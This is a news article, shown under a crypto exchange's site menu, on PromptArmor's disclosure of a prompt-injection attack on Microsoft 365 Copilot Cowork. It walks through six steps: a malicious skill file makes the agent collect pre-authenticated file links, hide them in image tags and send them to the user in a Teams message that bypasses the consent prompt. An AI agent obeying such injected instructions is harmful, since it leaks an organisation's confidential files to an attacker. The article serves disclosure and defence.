Futures
Access hundreds of perpetual contracts
CFD
Gold
One platform for global traditional assets
Options
Hot
Trade European-style vanilla options
Unified Account
Maximize your capital efficiency
Demo Trading
Introduction to Futures Trading
Learn the basics of futures trading
Futures Events
Join events to earn rewards
Demo Trading
Use virtual funds to practice risk-free trading
Launch
CandyDrop
Collect candies to earn airdrops
Launchpool
Quick staking, earn potential new tokens
HODLer Airdrop
Hold GT and get massive airdrops for free
Pre-IPOs
Unlock full access to global stock IPOs
Alpha Points
Trade on-chain assets and earn airdrops
Futures Points
Earn futures points and claim airdrop rewards
Promotions
AI
Gate AI
Your all-in-one conversational AI partner
Gate AI Bot
Use Gate AI directly in your social App
GateClaw
Gate Blue Lobster, ready to go
Gate for AI Agent
AI infrastructure, Gate MCP, Skills, and CLI
Gate Skills Hub
10K+ Skills
From office tasks to trading, the all-in-one skill hub makes AI even more useful.
GateRouter
Smartly choose from 40+ AI models, with 0% extra fees
Microsoft Copilot Cowork exposes major vulnerability: AI Agent susceptible to prompt injection attacks leaking corporate confidential files
Cybersecurity organization PromptArmor reveals that Microsoft 365 Copilot Cowork has a prompt injection vulnerability, allowing attackers to use a malicious skill file to cause corporate SharePoint and OneDrive confidential files to leak.
(Background: GitHub Copilot halts self-subscription: AI usage out of control, affordable plans are completely collapsing)
(Additional background: Complete guide to Claude Cowork: turning AI from a chat assistant into your digital employee)
Table of Contents
Toggle
Five tests, five successes. Last week, cybersecurity research firm PromptArmor released a threat intelligence report pointing out that Microsoft 365’s Copilot Cowork feature has a fully reproducible file leakage attack chain.
Attackers only need to embed five malicious commands into an 81-line skill configuration file to enable the AI agent to secretly send enterprise confidential files from SharePoint and OneDrive to a server controlled by the attacker, without the user’s knowledge.
This is not an isolated model issue. Both Claude Opus 4.7 and Claude Sonnet 4.6 have been verified as affected, with Opus 4.7 showing a more “aggressive” behavior by proactively expanding the search scope to include all files opened during the victim’s Cowork sessions this week.
Microsoft says they want to ask you, but they don't
The key to this attack lies in the gap between an official file and actual behavior.
Microsoft’s official documentation clearly states: “Cowork will seek your consent before performing sensitive operations, such as sending emails or posting messages in Teams.”
However, PromptArmor researchers found that when the recipient is the user themselves, this rule fails outright. Sending an email to oneself or a Teams message to oneself will automatically trigger Copilot Cowork to execute without any authorization prompt, and users have no settings to modify this behavior.
This detail becomes the critical loophole in the entire attack chain.
Copilot Cowork is a frontier feature of Microsoft 365 that accesses the user’s full cloud permissions via Microsoft Graph, capable of reading and manipulating data across the entire enterprise tenant. In other words, it can see everything you see, including financial reports on SharePoint, HR data in OneDrive, and all files containing personally identifiable information.
Attack steps
The attack chain consists of six steps:
Step 1: The victim’s SharePoint or OneDrive contains sensitive files with personal or financial data.
Step 2: The victim downloads a skill configuration file from the internet and uploads it to Copilot Cowork, a common operation similar to installing a plugin. The skill file is automatically loaded from a specific path in the user’s OneDrive, with very limited visibility for administrators.
Step 3: The victim asks Copilot Cowork to generate a weekly work summary, triggering the skill execution.
Step 4: The embedded prompt injection commands manipulate the agent to obtain “pre-authenticated download links” for each file, then embed these links as query parameters in malicious HTML image tags, which are sent to the attacker’s server.
What is a pre-authenticated download link? Simply put, it’s a URL with embedded authorization info. Anyone with this link can download the file directly without logging into a Microsoft account.
Step 5: The agent sends a Teams message to the user themselves, embedding these malicious image tags. This process requires no user authorization, and the malicious content is completely invisible to the user. Even if they open the message, nothing appears abnormal.
Step 6: When the user opens the Teams message, the browser automatically loads the images, transmitting the pre-authenticated download links to the attacker’s server. The attacker can then access these links to download all files at any time.
The smarter the model, the more comprehensive the leak
PromptArmor’s testing reveals a thought-provoking phenomenon: the more capable the model, the greater the damage in this attack scenario.
Initially, the tests used “automatic” mode, dynamically switching between Claude Opus 4.7 and Claude Sonnet 4.6. Researchers later verified only Opus 4.7, finding that the same injection commands fully succeeded.
This attack chain was successfully executed in all tests and is unrelated to the user’s specific query wording—any query that triggers skill loading can lead to injection success.
The persistence of the attack is also concerning. Copilot Cowork supports scheduled tasks, allowing users to set prompts to run automatically at regular intervals. Once the attacker’s injection is scheduled, the victim doesn’t need to take any action; the attack silently repeats each cycle, continuously exfiltrating enterprise secrets.
PromptArmor emphasizes that this is not a bug fixable by a single patch but a systemic risk inherent in the enterprise AI agent architecture. When an agent is granted delegated permissions across multiple systems, trust boundary failures in any one system can become an entry point for full compromise.
Restricting permissions is currently the only moat
PromptArmor also disclosed a separate vulnerability that allows data to leak from the Copilot Cowork sandbox environment, independent of this research. This issue is currently under responsible disclosure.
The reason for proactively revealing this attack chain instead of waiting for a fix is that the risk stems from system architecture design, not a specific patchable vulnerability. Users need to be informed and decide whether to accept this risk.
The current mitigation focuses on limiting the agent’s operational scope. Administrators can restrict file downloads in SharePoint by setting: Set-SPOSite -Identity -BlockDownloadPolicy $true, or block download functions based on sensitivity labels.
The cost is functionality loss: users can only view files in the browser, unable to download, print, or sync, including all Microsoft 365 apps like Word, Excel, PowerPoint.
This is also the second major security issue recently affecting the Microsoft Copilot ecosystem. Earlier, EchoLeak (CVE-2025-32711) was a prompt injection vulnerability in the Copilot personal edition. Varonis’ research on the Reprompt attack (CVE-2026-24307) revealed similar click-based data leaks. The indirect prompt injection vulnerability in Copilot Studio (CVE-2026-21520, CVSS 7.5) has been patched, but similar issues remain unaddressed across the broader Copilot product line.
The boundary of AI agent capabilities is becoming a new battleground for enterprise cybersecurity.
When a tool can “do things” on your behalf, its required access permissions inevitably expand, and every granted permission becomes a potential attack vector. Limiting an agent’s actions essentially limits its utility, and this paradox currently has no perfect solution.